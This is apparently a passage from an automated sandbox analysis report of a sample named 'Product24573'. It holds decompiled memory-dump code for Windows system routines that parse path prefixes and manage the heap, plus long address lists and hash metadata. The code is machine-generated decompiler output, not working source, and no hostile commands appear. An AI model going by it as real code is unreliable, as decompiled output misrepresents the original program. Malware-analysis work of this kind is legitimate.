														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E011C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0114D130(_t427, _t494, _t511);
				}
			}










































































                                          0x011c5ba5
                                          0x011c5baa
                                          0x011c5baf
                                          0x011c5bb4
                                          0x011c5bb6
                                          0x011c5bbc
                                          0x011c5bbe
                                          0x011c5bc4
                                          0x011c5bcd
                                          0x011c5bd3
                                          0x011c5bd6
                                          0x011c5bdc
                                          0x011c5be0
                                          0x011c5be3
                                          0x011c5beb
                                          0x011c5bf2
                                          0x011c5bf8
                                          0x011c5bfe
                                          0x011c5c04
                                          0x011c5c0e
                                          0x011c5c18
                                          0x011c5c1f
                                          0x011c5c25
                                          0x011c5c2a
                                          0x011c5c2c
                                          0x011c5c32
                                          0x011c5c3a
                                          0x011c5c3f
                                          0x011c5c42
                                          0x011c5c48
                                          0x011c5c5b
                                          0x011c5c5b
                                          0x011c5c2c
                                          0x011c5cb7
                                          0x011c5cb9
                                          0x011c5cbf
                                          0x011c5cc2
                                          0x011c5cca
                                          0x011c5ccb
                                          0x011c5ccb
                                          0x011c5cd1
                                          0x011c5cd7
                                          0x011c5cda
                                          0x011c5ce1
                                          0x011c5ce4
                                          0x011c5ce7
                                          0x011c5ced
                                          0x011c5cf3
                                          0x011c5cf9
                                          0x011c5cff
                                          0x011c5d08
                                          0x011c5d0a
                                          0x011c5d0e
                                          0x011c5d10
                                          0x00000000
                                          0x00000000
                                          0x011c5d16
                                          0x011c5d1a
                                          0x00000000
                                          0x00000000
                                          0x011c5d20
                                          0x011c5d22
                                          0x011c5d25
                                          0x011c5d2f
                                          0x011c5d2f
                                          0x011c5d33
                                          0x011c5d3d
                                          0x011c5d49
                                          0x011c5d4b
                                          0x00000000
                                          0x00000000
                                          0x011c5d5a
                                          0x011c5d5d
                                          0x011c5d60
                                          0x00000000
                                          0x00000000
                                          0x011c5d66
                                          0x011c5d69
                                          0x00000000
                                          0x00000000
                                          0x011c5d6f
                                          0x011c5d6f
                                          0x011c5d73
                                          0x011c5d79
                                          0x011c5d7f
                                          0x011c5d86
                                          0x011c5d95
                                          0x011c5d98
                                          0x011c5dba
                                          0x011c5dcb
                                          0x011c5dce
                                          0x011c5dd3
                                          0x011c5dd6
                                          0x011c5dd8
                                          0x011c5de6
                                          0x011c5dec
                                          0x011c5dee
                                          0x011c5df1
                                          0x011c5df3
                                          0x011c635a
                                          0x011c635a
                                          0x00000000
                                          0x011c635a
                                          0x011c5dfe
                                          0x011c5e02
                                          0x011c5e05
                                          0x011c5e07
                                          0x011c5e10
                                          0x011c5e13
                                          0x011c5e1b
                                          0x011c5e1c
                                          0x011c5e21
                                          0x011c5e22
                                          0x011c5e23
                                          0x011c5e25
                                          0x011c5e2a
                                          0x011c5e2c
                                          0x011c5e2e
                                          0x011c5e36
                                          0x011c5e39
                                          0x011c5e42
                                          0x011c5e47
                                          0x011c5e4d
                                          0x011c5e54
                                          0x011c5e54
                                          0x011c5e54
                                          0x011c5e2e
                                          0x011c5e5c
                                          0x011c5e5f
                                          0x011c5e62
                                          0x011c5e64
                                          0x011c5e6b
                                          0x011c5e70
                                          0x011c5e7a
                                          0x011c5e7a
                                          0x011c5e7a
                                          0x011c5e6b
                                          0x011c5e7e
                                          0x011c5e7f
                                          0x011c5e7f
                                          0x011c5e81
                                          0x011c5e87
                                          0x011c5e8b
                                          0x011c5e8c
                                          0x011c5e8c
                                          0x011c5e8c
                                          0x011c5e9a
                                          0x011c5e9c
                                          0x011c5ea2
                                          0x011c5ea6
                                          0x011c5f50
                                          0x011c5f50
                                          0x011c5f57
                                          0x011c5f66
                                          0x011c5f66
                                          0x011c5f66
                                          0x011c5f68
                                          0x011c5f6a
                                          0x011c63d0
                                          0x00000000
                                          0x011c5f70
                                          0x011c5f70
                                          0x011c5f91
                                          0x011c5f9c
                                          0x011c5f9e
                                          0x011c5fa4
                                          0x011c5fa6
                                          0x011c638c
                                          0x011c6392
                                          0x011c63a1
                                          0x011c63a7
                                          0x011c63af
                                          0x011c63af
                                          0x011c63bd
                                          0x011c63d8
                                          0x00000000
                                          0x011c63d8
                                          0x011c5fac
                                          0x011c5fb2
                                          0x011c5fb4
                                          0x011c5fbd
                                          0x011c5fc6
                                          0x011c5fce
                                          0x011c5fd4
                                          0x011c5fdc
                                          0x011c5fec
                                          0x011c5fed
                                          0x011c5fee
                                          0x011c5fef
                                          0x011c5ff9
                                          0x011c5ffa
                                          0x011c5ffb
                                          0x011c5ffc
                                          0x011c6000
                                          0x011c6004
                                          0x011c6012
                                          0x011c6012
                                          0x011c6018
                                          0x011c6019
                                          0x011c601a
                                          0x011c601b
                                          0x011c601c
                                          0x011c6020
                                          0x011c6059
                                          0x011c605c
                                          0x011c6061
                                          0x011c6061
                                          0x011c6022
                                          0x011c6022
                                          0x011c6022
                                          0x011c6025
                                          0x011c602a
                                          0x011c602b
                                          0x011c6031
                                          0x011c6037
                                          0x011c6038
                                          0x011c603e
                                          0x011c6048
                                          0x011c6049
                                          0x011c604a
                                          0x011c604b
                                          0x011c604c
                                          0x011c604d
                                          0x011c6053
                                          0x011c6054
                                          0x011c6054
                                          0x011c6062
                                          0x011c6065
                                          0x011c6067
                                          0x011c606a
                                          0x011c6070
                                          0x011c6075
                                          0x011c6076
                                          0x011c6081
                                          0x011c6087
                                          0x011c6095
                                          0x011c6099
                                          0x011c609e
                                          0x011c60a4
                                          0x011c60ae
                                          0x011c60b0
                                          0x011c60b3
                                          0x011c60b6
                                          0x011c60b8
                                          0x011c60ba
                                          0x011c60ba
                                          0x011c60ba
                                          0x011c60ba
                                          0x011c60be
                                          0x011c60c0
                                          0x011c60c5
                                          0x011c60c5
                                          0x011c60c5
                                          0x011c60c6
                                          0x011c60cd
                                          0x011c6114
                                          0x011c60cf
                                          0x011c60cf
                                          0x011c60d4
                                          0x011c60d5
                                          0x011c60da
                                          0x011c60db
                                          0x011c60e1
                                          0x011c60e2
                                          0x011c60e8
                                          0x011c60f8
                                          0x011c60fd
                                          0x011c60fe
                                          0x011c6102
                                          0x011c6104
                                          0x011c6107
                                          0x011c6109
                                          0x011c610b
                                          0x011c610b
                                          0x011c610b
                                          0x011c610b
                                          0x011c610f
                                          0x011c610f
                                          0x011c6117
                                          0x011c611a
                                          0x011c611f
                                          0x011c6125
                                          0x011c6134
                                          0x011c6139
                                          0x011c613f
                                          0x011c6146
                                          0x011c6148
                                          0x011c614b
                                          0x011c614d
                                          0x011c614f
                                          0x011c614f
                                          0x011c614f
                                          0x011c614f
                                          0x011c6153
                                          0x011c6159
                                          0x011c6159
                                          0x011c615c
                                          0x011c6163
                                          0x011c6169
                                          0x011c616c
                                          0x011c6172
                                          0x011c6181
                                          0x011c6186
                                          0x011c6187
                                          0x011c618b
                                          0x011c6191
                                          0x011c6195
                                          0x011c61a3
                                          0x011c61bb
                                          0x011c61c0
                                          0x011c61c3
                                          0x011c61cc
                                          0x011c61d0
                                          0x011c61dc
                                          0x011c61de
                                          0x011c61e1
                                          0x011c61e4
                                          0x011c61e6
                                          0x011c61e8
                                          0x011c61e8
                                          0x011c61e8
                                          0x011c61e8
                                          0x011c61e6
                                          0x011c61ec
                                          0x011c61f3
                                          0x011c6203
                                          0x011c6209
                                          0x011c620a
                                          0x011c6216
                                          0x011c621d
                                          0x011c6227
                                          0x011c6241
                                          0x011c6246
                                          0x011c624c
                                          0x011c6257
                                          0x011c6259
                                          0x011c625c
                                          0x011c625e
                                          0x011c6260
                                          0x011c6260
                                          0x011c6260
                                          0x011c6260
                                          0x011c625e
                                          0x011c6264
                                          0x011c6267
                                          0x011c6269
                                          0x011c6315
                                          0x011c6315
                                          0x011c631b
                                          0x011c631e
                                          0x011c6324
                                          0x011c6327
                                          0x011c632f
                                          0x011c6330
                                          0x011c6333
                                          0x011c633a
                                          0x011c633c
                                          0x011c6335
                                          0x011c6335
                                          0x011c6335
                                          0x011c633f
                                          0x011c6342
                                          0x011c634c
                                          0x011c6352
                                          0x011c6355
                                          0x011c6355
                                          0x011c6359
                                          0x00000000
                                          0x011c626f
                                          0x011c6275
                                          0x011c6275
                                          0x011c6278
                                          0x011c627e
                                          0x011c627e
                                          0x011c6281
                                          0x011c6287
                                          0x011c628d
                                          0x011c6298
                                          0x011c629c
                                          0x011c62a2
                                          0x011c629e
                                          0x011c629e
                                          0x011c629e
                                          0x011c62a7
                                          0x011c62a7
                                          0x011c62aa
                                          0x011c62b0
                                          0x011c62f0
                                          0x011c62f0
                                          0x011c62f2
                                          0x011c62f8
                                          0x011c62fd
                                          0x011c62b2
                                          0x011c62b2
                                          0x011c62b2
                                          0x011c62b5
                                          0x011c62dd
                                          0x011c62e2
                                          0x011c62e5
                                          0x011c62b7
                                          0x011c62b8
                                          0x011c62bb
                                          0x011c62bd
                                          0x011c62c0
                                          0x011c62c4
                                          0x011c62cd
                                          0x011c62cd
                                          0x011c62c0
                                          0x011c62bb
                                          0x011c62b5
                                          0x011c6302
                                          0x011c6303
                                          0x011c6305
                                          0x011c6305
                                          0x011c6305
                                          0x011c630c
                                          0x011c630c
                                          0x00000000
                                          0x011c627e
                                          0x011c6269
                                          0x011c5eac
                                          0x011c5ebb
                                          0x011c5ebe
                                          0x011c5ecb
                                          0x011c5ecb
                                          0x011c5ece
                                          0x011c5ece
                                          0x011c5ed4
                                          0x011c5ed7
                                          0x011c5ed9
                                          0x011c5edb
                                          0x011c5edb
                                          0x011c5ee1
                                          0x011c5ee1
                                          0x011c5ee3
                                          0x011c5f20
                                          0x011c5f20
                                          0x011c5ee5
                                          0x011c5ee5
                                          0x011c5ee5
                                          0x011c5ee8
                                          0x011c5f11
                                          0x011c5f18
                                          0x011c5eea
                                          0x011c5eea
                                          0x011c5eed
                                          0x011c5ef2
                                          0x011c5ef8
                                          0x011c5efb
                                          0x011c5f0a
                                          0x011c5f0a
                                          0x011c5eed
                                          0x011c5ee8
                                          0x011c5f22
                                          0x011c5f28
                                          0x00000000
                                          0x00000000
                                          0x011c5f30
                                          0x011c5f31
                                          0x011c5f37
                                          0x011c5f3a
                                          0x011c5f3d
                                          0x011c5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011c5f46
                                          0x011c5f48
                                          0x011c5f4d
                                          0x00000000
                                          0x011c5f4d
                                          0x011c5dda
                                          0x011c5ddf
                                          0x00000000
                                          0x011c5ddf
                                          0x011c5dd8
                                          0x011c5da7
                                          0x011c5da9
                                          0x011c5dac
                                          0x011c5dae
                                          0x00000000
                                          0x011c5db4
                                          0x011c5db4
                                          0x00000000
                                          0x011c5db4
                                          0x011c5dae
                                          0x011c5d88
                                          0x011c5d8d
                                          0x011c6363
                                          0x011c6369
                                          0x011c636a
                                          0x011c6370
                                          0x011c6372
                                          0x011c637a
                                          0x011c637b
                                          0x011c637d
                                          0x00000000
                                          0x00000000
                                          0x011c637f
                                          0x011c6385
                                          0x00000000
                                          0x011c6385
                                          0x011c5d38
                                          0x011c5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011c5d3b
                                          0x011c5d27
                                          0x011c5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011c6360
                                          0x00000000
                                          0x011c6360
                                          0x011c5c10
                                          0x011c5c10
                                          0x011c63da
                                          0x011c63e5
                                          0x011c63e5

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 832ee4f64b0fc643035c6374c1579f8c80439bc8d24ba00cd1e677dc405c238d
                                          • Instruction ID: 245e931dc8fc8a9beb18c48281e7fd511a6e23fee1136f507e1508aefafad421
                                          • Opcode Fuzzy Hash: 832ee4f64b0fc643035c6374c1579f8c80439bc8d24ba00cd1e677dc405c238d
                                          • Instruction Fuzzy Hash: F0425B71A00229CFDB68CF68C880BA9BBB1FF55704F1581AED94DAB342D734A985CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01114120 Relevance: .4, Instructions: 444COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E01114120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x11ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0112F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01116E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01114620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01116E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M011145F8))) {
												case 0:
													_v568 = 0x10d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x10d11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01114620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0113F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0113F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E010F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0110EB70(1, 0x11e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0110AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E011395D0();
																			L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0113B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01133D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0113B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                          0x01114128
                                          0x01114135
                                          0x0111413c
                                          0x01114141
                                          0x01114145
                                          0x01114147
                                          0x0111414e
                                          0x01114151
                                          0x01114159
                                          0x0111415c
                                          0x01114160
                                          0x01114164
                                          0x01114168
                                          0x0111416c
                                          0x0111417f
                                          0x01114181
                                          0x0111446a
                                          0x0111446a
                                          0x0111418c
                                          0x01114195
                                          0x01114199
                                          0x01114432
                                          0x01114439
                                          0x0111443d
                                          0x01114442
                                          0x01114447
                                          0x00000000
                                          0x0111419f
                                          0x011141a3
                                          0x011141b1
                                          0x011141b9
                                          0x011141bd
                                          0x011145db
                                          0x011145db
                                          0x00000000
                                          0x011141c3
                                          0x011141c3
                                          0x011141ce
                                          0x011141d4
                                          0x0115e138
                                          0x0115e13e
                                          0x0115e169
                                          0x0115e16d
                                          0x0115e19e
                                          0x0115e16f
                                          0x0115e16f
                                          0x0115e175
                                          0x0115e179
                                          0x0115e18f
                                          0x0115e193
                                          0x00000000
                                          0x0115e199
                                          0x00000000
                                          0x0115e199
                                          0x0115e193
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011141da
                                          0x011141da
                                          0x011141df
                                          0x011141e4
                                          0x011141ec
                                          0x01114203
                                          0x01114207
                                          0x0115e1fd
                                          0x01114222
                                          0x01114226
                                          0x0115e1f3
                                          0x0115e1f3
                                          0x0111422c
                                          0x0111422c
                                          0x01114233
                                          0x0115e1ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01114239
                                          0x01114239
                                          0x01114239
                                          0x01114239
                                          0x01114233
                                          0x01114226
                                          0x011141ee
                                          0x011141ee
                                          0x011141f4
                                          0x01114575
                                          0x0115e1b1
                                          0x0115e1b1
                                          0x00000000
                                          0x0111457b
                                          0x0111457b
                                          0x01114582
                                          0x0115e1ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01114588
                                          0x01114588
                                          0x0111458c
                                          0x0115e1c4
                                          0x0115e1c4
                                          0x00000000
                                          0x01114592
                                          0x01114592
                                          0x01114599
                                          0x0115e1be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111459f
                                          0x0111459f
                                          0x011145a3
                                          0x0115e1d7
                                          0x0115e1e4
                                          0x00000000
                                          0x011145a9
                                          0x011145a9
                                          0x011145b0
                                          0x0115e1d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011145b6
                                          0x011145b6
                                          0x011145b6
                                          0x00000000
                                          0x011145b6
                                          0x011145b0
                                          0x011145a3
                                          0x01114599
                                          0x0111458c
                                          0x01114582
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011141f4
                                          0x0111423e
                                          0x01114241
                                          0x011145c0
                                          0x011145c4
                                          0x00000000
                                          0x011145ca
                                          0x011145ca
                                          0x00000000
                                          0x0115e207
                                          0x0115e20f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011145d1
                                          0x00000000
                                          0x00000000
                                          0x011145ca
                                          0x00000000
                                          0x01114247
                                          0x01114247
                                          0x01114247
                                          0x01114249
                                          0x01114249
                                          0x01114249
                                          0x01114251
                                          0x01114251
                                          0x01114257
                                          0x0111425f
                                          0x0111426e
                                          0x01114270
                                          0x0111427a
                                          0x0115e219
                                          0x0115e219
                                          0x01114280
                                          0x01114282
                                          0x01114456
                                          0x011145ea
                                          0x00000000
                                          0x011145f0
                                          0x0115e223
                                          0x00000000
                                          0x0115e223
                                          0x0111445c
                                          0x0111445c
                                          0x00000000
                                          0x0111445c
                                          0x00000000
                                          0x01114288
                                          0x0111428c
                                          0x0115e298
                                          0x01114292
                                          0x01114292
                                          0x0111429e
                                          0x011142a3
                                          0x011142a7
                                          0x011142ac
                                          0x0115e22d
                                          0x011142b2
                                          0x011142b2
                                          0x011142b9
                                          0x011142bc
                                          0x011142c2
                                          0x011142ca
                                          0x011142cd
                                          0x011142cd
                                          0x011142d4
                                          0x0111433f
                                          0x0111433f
                                          0x011142d6
